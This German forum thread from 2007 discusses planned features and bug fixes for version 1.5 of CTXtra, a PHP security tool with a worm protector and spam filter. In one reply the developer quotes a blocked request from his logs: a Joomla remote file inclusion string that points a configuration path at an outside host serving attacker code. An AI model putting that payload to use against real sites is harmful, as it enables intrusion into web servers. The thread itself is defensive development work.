Sicherheitssoftware CTXtra
Hallo 22 Mai 2012, 08:14:28 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und SitzungslängeSorry, Du musst für die Shout Box eingeloggt sein!
News: We search translators for other languages.
 
  Übersicht Hilfe Suche Einloggen Registrieren  
Seiten: [1] 2   Nach unten
  Drucken  
Autor Thema: ToDo v1.5  (Gelesen 2983 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
Nordin
Administrator
Hero Member
*****
Offline Offline

Geschlecht: Männlich
Beiträge: 1.125



E-Mail
« am: 22 Juni 2007, 16:12:14 »

      So leute ich haut in die tasten was soll verbessert und was muss geändert werden an der v1.4 ?

      Was mir auf gefallen ist, auf jedenfall die aktualisierung der online Listen... mein Trafik schießt quasie nur so in die höhe *g* war ja vorauszusehen... aber is nich so wild. Ich hab dafür schon so meine idee aber wer noch nen paar gedanken dazu hat kann sie mir ruhig mitteilen.

    ToDo > v1.5
    • ERLEDIGT FTP-Zugang (FTP-User soll Files anlegen) vorerst nur für das update
    • ERLEDIGT aktualisierung der online Listen überarbeiten (Trafik senken)
    • ERLEDIGT Ordnerstrucktur überarbeiten:
      • ctracker/inc/... config, update, wormprotect,  spamfilter, functions, reset, others und so weiter
      • ctracker/logs/... nur logfiles
      • ctracker/language/...  sprachdateien
      • ctracker/admin/...  weitere files mit sonderfunktionen "nur adminzugriff" z.b. reset.php
      • ctracker/... index.php, ctracker.php, common.php
    • ERLEDIGT wormprotector in require/include machen und in eine externe txt verweisen (bessere updatemöglichkeit)
    • ERLEDIGT footer/copyright in require/include machen und in eine externe footer.txt verweisen (bessere updatemöglichkeit)
    • ERLEDIGT phpsession mit session delay verknüpfen... automatisches ausloggen bei XX sekunden (sicherheit adminbereich)
    • VERSCHOBEN auf v1.6 neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)
    • VERSCHOBEN auf v1.6 sicherheitsmeldung und intrusionmessage als html ausgeben lassen
    • VERSCHOBEN auf v1.6 alternative zu allow_url_fopen
    • ERLEDIGT neues Layout
    • ERLEDIGT auslagern der texte in language-dateien fertig
      • german
      • english
      • Jetzt brauch ich nur noch freiwilige die andere Sprachen ausser der deutschen mächtig sind und mir die Dateien übersetzen Zwinkernd
    • ERLEDIGT Dank schlumpfi erweitert sich unser Wormprotector täglich... z.Z. sind es über 380 signaturen die euch ab Version v1.5 schützen werden
    • ERLEDIGT Wormprotector- und SPAM-Logfiles downloaden (zum auswerten nach angriffen)
    • ERLEDIGT Whitelist für Wormprotector (ermöglicht euch signaturen einzutragen die nicht geblockt werden sollen... z.B: index.php?kill= )
    • ERLEDIGT pingtimeout eingebaut... vermeidet overloads bei nicht erreichbarkeit des ctxtra-Servers
    • ERLEDIGT Auswertung der Worm-Angiffe im ACP erweitert (löschen und hinzufügen der IPs, Anzeige ob IPs vom IP-Filter geblockt werden und und und)
    • ERLEDIGT Installation und Update mit Sprachauswahl


    behobene Bugs und kleinere Fehler:
    • ERLEDIGT SPAM-Filter im ACP überarbeitet
      • Scripte ( <script> ) wird nicht mehr ausgefühert
      • Das Anzeigen der "geblockte SPAM-Einträge"-Liste funktioniert besser (jetzt auch im FF und IE7)
      • Die Uhrzeit wird richtig angezeigt (vorher wurde als Minute der Monat angezeigt Grinsend)
      • email function überarbeitet
      • reset.php überarbeitet (nach dem man geblockt wurde einfach /admin/reset.php aufrufen)
    • ERLEDIGT Wurm-Angriffe im ACP überarbeitet
      • Das selbe wie im SPAM-Filter Grinsend die Uhrzeit wird jetzt richtig angezeigt (vorher wurde als Minute der Monat angezeigt)
    • ERLEDIGT PHP ERRORS und NOTICE gesucht, gefunden und behoben...

    VERSCHOBEN auf v1.6
    addons:
    ... ping
    ... tracerout
    ... whois
    ... debug_mode[/list][/list]
    « Letzte Änderung: 03 August 2007, 14:37:23 von Nordin » Gespeichert

    Bei Problemen bitte IMMER CTXtra Version und PHP-Version mit angeben!!!
    Welche PHP Version bei euch läuft seht ihr unter http://deine-seite.tld/ctracker/admin/phpinfo.php
    schlumpfi
    Moderator
    Hero Member
    *****
    Offline Offline

    Beiträge: 1.318



    « Antworten #1 am: 22 Juni 2007, 16:57:54 »

    1) ordnerstruktur verbessern
    ...ctracker/inc/... config und update files (wormprotect, ips, spam, bots) ... ggf functions, sowie reset und others
    ...ctracker/logs/... nur logfiles und debug.txt
    ...ctracker/tpl/...  html templates
    ...ctracker/admin/...  weitere files mit sonderfunktionen "nur adminzugriff" ... others.php / reset.php / update.php / bots.php
    ...ctracker/images/.... kein kommentar  Zwinkernd
    ...ctracker/ ........ nur index.php mit htaccess

    2) function wormprotector ... signaturen...
    ...daraus ein require/include machen und in eine externe txt verweisen, die eingebunden wird... bessere updatemöglichkeit...

    3) phpsession mit session delay verknüpfen... automatisches ausloggen bei XX sekunden (sicherheit adminbereich)

    4)
    a)erweitertes copyright, erstelle dein eigenes, füge dieses als encoded im script ein, kann keiner mehr manipulieren oder vergessen..
    b) neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)
    c) sicherheitsmeldung und intrusionmessage als html ausgeben lassen

    5)  addons:
    ... ping
    ... tracerout
    ... whois

    6) debug_mode


    ... mehr, wenn ich mal genauer hinsehe  Grinsend
    Gespeichert

    Man muß nicht alles wissen, man muß nur wissen, wo es steht!
    Nordin
    Administrator
    Hero Member
    *****
    Offline Offline

    Geschlecht: Männlich
    Beiträge: 1.125



    E-Mail
    « Antworten #2 am: 22 Juni 2007, 17:14:12 »

    Zitat
    b) neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)
    wobei man jetzt schon die functionen einzeln an beliebiger stelle einbinden könnte Zwinkernd


    Super... hatten wir zwar schon in nem anderen Beitagr aber hier passt das besser her...
    Gespeichert

    Bei Problemen bitte IMMER CTXtra Version und PHP-Version mit angeben!!!
    Welche PHP Version bei euch läuft seht ihr unter http://deine-seite.tld/ctracker/admin/phpinfo.php
    schlumpfi
    Moderator
    Hero Member
    *****
    Offline Offline

    Beiträge: 1.318



    « Antworten #3 am: 22 Juni 2007, 19:05:32 »

    Zitat
    b) neue option ... benutzerdefiniertes template .... counter als template (html) ausgeben lassen (fortgeschrittene können selber bearbeiten, was gewünscht wird anzeigen)
    wobei man jetzt schon die functionen einzeln an beliebiger stelle einbinden könnte Zwinkernd
    Super... hatten wir zwar schon in nem anderen Beitagr aber hier passt das besser her...

    du weist das, ich weis das, aber weis das auch einer der sich nicht so mit webcoding auskennt?  Grinsend
    Gespeichert

    Man muß nicht alles wissen, man muß nur wissen, wo es steht!
    Nordin
    Administrator
    Hero Member
    *****
    Offline Offline

    Geschlecht: Männlich
    Beiträge: 1.125



    E-Mail
    « Antworten #4 am: 22 Juni 2007, 21:00:07 »

    Zitat
    aber weis das auch einer der sich nicht so mit webcoding auskennt?
    *g* nö war ja auch nicht so gedacht... in der ersten version hatte ich noch nichtmal funktionen eingebaut Grinsend seit der v1.3 war das dann anders und in der v1.4 hab ich dann schon alles in funktionen gesteckt. das ist quasi schon meine vorarbeit für die v1.5 Zwinkernd

    Da wollte ich die alle funktionen zur verfügung stellen... ist also schon seit ende der v1.3 in planung... nur ist mir lieber nicht alles mit einmal zu machen sondern stück für stück damit die versionen nich all zu verbogen sind wenn ich sie raus gebe. (man muss auch noch dazusagen das ich erst seit einem jahr mit php progge.. bin also auch auf hilfe von ausserhalb angewiesen Zwinkernd )
    Gespeichert

    Bei Problemen bitte IMMER CTXtra Version und PHP-Version mit angeben!!!
    Welche PHP Version bei euch läuft seht ihr unter http://deine-seite.tld/ctracker/admin/phpinfo.php
    schlumpfi
    Moderator
    Hero Member
    *****
    Offline Offline

    Beiträge: 1.318



    « Antworten #5 am: 23 Juni 2007, 14:33:33 »

    ... zum thema updates der listen und traffic..

    1) updatecheck (signaturen und listen)  mit filecheck md5... UND NICHT ÜBER COUNT!
    locale wird md5 geprüft... ist prüfsumme "nicht gleich" die auf dem server... downloaden... else "die"

    2) userupdates und userlists...
    a) diese userspezifischen signaturen in eine extra file speichern
    b) user ermöglichen und fragen, update master db auf wupmedia-server?  wenn ja ... update db ... else "die"

    mfg...
    Gespeichert

    Man muß nicht alles wissen, man muß nur wissen, wo es steht!
    schlumpfi
    Moderator
    Hero Member
    *****
    Offline Offline

    Beiträge: 1.318



    « Antworten #6 am: 24 Juni 2007, 18:47:46 »

    =>allow_url_fopen

    führen machne hoster und webspace anbieter nicht aus, da serverseitig gesperrt ist...
    auch dessen support lässt diese option nicht aktivieren, hacker angriffe...
    auch option mit htaccess und allow_url_fopen 1 funzt nicht, da hoster overwrite deaktiviert...
    auch option übder ini_alter() funzt nicht, da diese ebenso meistens blockiert sind...

    andere möglichkeit mal in betracht ziehen...

    mfg
    « Letzte Änderung: 24 Juni 2007, 18:54:00 von blasehase » Gespeichert

    Man muß nicht alles wissen, man muß nur wissen, wo es steht!
    schlumpfi
    Moderator
    Hero Member
    *****
    Offline Offline

    Beiträge: 1.318



    « Antworten #7 am: 26 Juni 2007, 19:25:59 »

    um dir mal flux nen kleinen denkanstoss für ein schnelles bugfix zu geben, damit hier massive probleme mit chmod und url_fopen beseitigt werden können
    =>> allow_url_fopen()  => fopen()

    kein "$fp_borddir" bzw "$ct_borddir"
    sondern
    "$ct_filedir" + "$fp_filedir"


    BSP
    $fp_filedir = @fopen("http://".$_SERVER['HTTP_HOST']."/".$ct_filedir."/ctracker.php", "r");

    NEU:
    $fp_filedir = @fopen($ct_filedir."/ctracker.php", "r");

    oder ggf direkt vom root ausgehen...  Grinsend

    mfg



    Gespeichert

    Man muß nicht alles wissen, man muß nur wissen, wo es steht!
    2337
    Newbie
    *
    Offline Offline

    Beiträge: 27


    « Antworten #8 am: 29 Juni 2007, 18:43:57 »

    Das man bestimmte URL's erlauben kann Ohne das diese geblockt werden
    z.b index.php?file=killover.rar

    ---------

    Das unter den Anzeigen bei Angriff geblockt

    1 Angriff von 195.16.251.62 am 29.06.2007 in Stunde 17, erster Angriff um 17:06:36
    index?file=Test.rar

    Das da die URL steht
    wie ich sie jetzt hingeschrieben habe!
    Gespeichert
    schlumpfi
    Moderator
    Hero Member
    *****
    Offline Offline

    Beiträge: 1.318



    « Antworten #9 am: 29 Juni 2007, 23:03:06 »

    Das man bestimmte URL's erlauben kann Ohne das diese geblockt werden
    z.b index.php?file=killover.rar

    => eine sogenannte "whitelist" erstellen...
    wenn eintrag in whitlist vorhanden... dann lasse alle ohne ausnahme zu...


    Das unter den Anzeigen bei Angriff geblockt

    1 Angriff von 195.16.251.62 am 29.06.2007 in Stunde 17, erster Angriff um 17:06:36
    index?file=Test.rar

    Das da die URL steht
    wie ich sie jetzt hingeschrieben habe!

    => ansicht design und optionen der "logs auslesen" verbessern ... tabellen, string replace, string brake, usw...

    mfg
    Gespeichert

    Man muß nicht alles wissen, man muß nur wissen, wo es steht!
    2337
    Newbie
    *
    Offline Offline

    Beiträge: 27


    « Antworten #10 am: 29 Juni 2007, 23:09:18 »

    Das man bestimmte URL frei geben kann
    Beispiel: index.php?file=sqltexter.rar

    Würde ja geblockt werden, Ihr wisst schon was ich meine;)

    ----------

    Das bei Angriffe geblockt!
    Das man auf der seite unter den Daten auch den QUERY_STRING sehen kann, wie in den alten versionen

    1 Angriff von 85.126.174.115 am 29.06.2007 in Stunde 19, erster Angriff um 19:06:07 [ mehr ]
    file=index.php
    Gespeichert
    Nordin
    Administrator
    Hero Member
    *****
    Offline Offline

    Geschlecht: Männlich
    Beiträge: 1.125



    E-Mail
    « Antworten #11 am: 01 Juli 2007, 11:55:10 »

    Zitat
    Das bei Angriffe geblockt!
    Das man auf der seite unter den Daten auch den QUERY_STRING sehen kann, wie in den alten versionen
    Ist doch?! Also der QUERY_STRING steht doch unter [ mehr ] ... Oder meinst was anderes?
    Gespeichert

    Bei Problemen bitte IMMER CTXtra Version und PHP-Version mit angeben!!!
    Welche PHP Version bei euch läuft seht ihr unter http://deine-seite.tld/ctracker/admin/phpinfo.php
    2337
    Newbie
    *
    Offline Offline

    Beiträge: 27


    « Antworten #12 am: 03 Juli 2007, 15:06:58 »

    Soll aber auch auf der haupt seite stehen und nicht nur unter mehr!
    Gespeichert
    Nordin
    Administrator
    Hero Member
    *****
    Offline Offline

    Geschlecht: Männlich
    Beiträge: 1.125



    E-Mail
    « Antworten #13 am: 03 Juli 2007, 15:36:58 »

    Hmm und was wäre der Grund das es direkt dort steht und nicht unter mehr?

    Ein grund der aus meiner sicht dagegen spricht ist die länge des QUERY_STRING

    So sieht ein geblockter bei mir aus:
    _request=&_request[option]=com_content&_request[itemid]=1&globals=&mosconfig_absolute_path=http://securityjobs.us/xpl/tembak.txt?

    Ich finde das die Seite dann zu überladen wird wenn ich es so mache. Aber wenn du mir nen gutes argument lieferst oder noch andere der meinung sind den Querystring nach vorn zu holen dann mach ich das Zwinkernd
    Gespeichert

    Bei Problemen bitte IMMER CTXtra Version und PHP-Version mit angeben!!!
    Welche PHP Version bei euch läuft seht ihr unter http://deine-seite.tld/ctracker/admin/phpinfo.php
    schlumpfi
    Moderator
    Hero Member
    *****
    Offline Offline

    Beiträge: 1.318



    « Antworten #14 am: 03 Juli 2007, 19:30:42 »

    Aber wenn du mir nen gutes argument lieferst oder noch andere der meinung sind den Querystring nach vorn zu holen dann mach ich das Zwinkernd

     Huch

    absolut dagegen!!!

    1.) warum soll dieser angezeigt werden, den es interesiert klickt auf "mehr" ...
    je nach dem wie der string aussieht, kann er bis zu zich zeichen haben, das kann probleme bei der darstellung der logs bereiten

    2.) öffentliche query strings?? wen bitte gehen query strings was an ausser den admin?Huch


    todo 1.5 .. => admin mit htacces schützen und zusätzlich sessions einbauen...

    oder hab  ich da was falsch verstanden Huch

    mfg

    Gespeichert

    Man muß nicht alles wissen, man muß nur wissen, wo es steht!
    Seiten: [1] 2   Nach oben
      Drucken  
     
    Gehe zu:  

    TinyPortal v.1.0.6 beta 2 © Bloc
    Powered by MySQL Powered by PHP Powered by SMF 1.1.7 | SMF © 2006, Simple Machines LLC Prüfe XHTML 1.0 Prüfe CSS
    Seite erstellt in 0.105 Sekunden mit 27 Zugriffen.